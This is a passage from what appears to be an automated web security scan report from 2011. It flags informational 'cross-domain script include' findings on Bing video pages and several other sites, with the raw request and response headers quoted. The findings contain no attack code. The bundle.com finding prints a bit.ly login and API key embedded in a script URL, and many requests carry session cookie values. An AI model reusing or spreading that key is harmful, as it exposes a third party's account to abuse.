23.423. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 73776
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:20 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:20 GMT
Connection: close
Set-Cookie: _SS=SID=82E68AF887F9462D85273268B2AD8683; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c72c1860541c646f2a3cddecb5eb5aa15; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:20 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.424. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69364
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: _SS=SID=05091685D9CF4B10AA86045E50531C30; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c821edda8870d484ea116ec82b5b3c873; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.425. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76002
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.109 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:43 GMT
Connection: close
Set-Cookie: _SS=SID=5BD6D1FA28554728966DF10884F75376; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8b2b3bcdf6bf491eb2c87f28bb9624a1; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:43 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.426. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 73050
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:38 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.172 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:38 GMT
Connection: close
Set-Cookie: _SS=SID=B71C8D628B0F4062BAF75BDD9CE07BCA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7159d46559974b7eafd96922676f898f; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.427. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:40 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:40 GMT
Connection: close
Set-Cookie: _SS=SID=2E376A0BF5834E45B98F75D90803364C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf02d2bc303694c3ba9934d227af68c96; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.428. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 74654
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.172 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:34 GMT
Connection: close
Set-Cookie: _SS=SID=BCB98114028D4A5E81EF691306272468; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccd6fb92b12e34795ba142d92e75f5673; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.429. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=225
Content-Length: 77586
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:05:41 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:55 GMT
Connection: close
Set-Cookie: _SS=SID=A04847CB1C4A4F00ADBD32C3561048B5; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cc7f5dcb1528646278493d65923bfb811; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.430. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

Response

23.431. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

Response

23.432. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.channel.aol.com/_media/channels/ad_refresher.js
http://js.adsonar.com/js/adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000
http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/journals_js/journals_blog_this.js
http://o.aolcdn.com/omniunih.js
http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.404292352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31057
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</title>

<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/journals_js/journals_blog_this.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
p://o.aolcdn.com/art/merge/?f=/_media/channels/common.css&f=/_media/channels/us.bv/bv.css&f=/_media/ch_css/bv_redesign-r18g.css&f=/_media/ch_bv/bv_comments.css&ver=1b&expsec=31536000&expsec=864000" />
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000"></script>
...[SNIP]...

<script src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>

<script src="http://cdn.channel.aol.com/_media/channels/ad_refresher.js" type="text/javascript" language="javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="text">
<script type="text/javascript" src="http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js"> </script>
...[SNIP]...

23.434. http://www.bundle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bundle.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://analytics.live.com/Analytics/msAnalytics.js
http://bit.ly/javascript-api.js?version=latest&login=jayk&apiKey=R_f1ac808d96b3430478cc0b7453905b5b

Request

GET / HTTP/1.1
Host: www.bundle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app02
X-Bundle-Server: prod-web01
Date: Sat, 29 Jan 2011 23:53:32 GMT
Content-Length: 9134
Connection: close
Cache-Control: private
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</div>

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=jayk&apiKey=R_f1ac808d96b3430478cc0b7453905b5b"></script>
<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/msAnalytics.js"></script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.435. http://www.collectspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collectspace.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://server1.opentracker.net/?site=www.collectspace.com
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 03:05:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/
Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT
Content-Length: 35661

<HTML>
<HEAD>
<META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</table>

<script defer src="http://server1.opentracker.net/?site=www.collectspace.com"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dabagirls.com
Path:	/\|http:/www.stylemepretty.com/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

http://stats.wordpress.com/e-201104.js

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 01:52:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

23.437. http://www.dailygrail.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
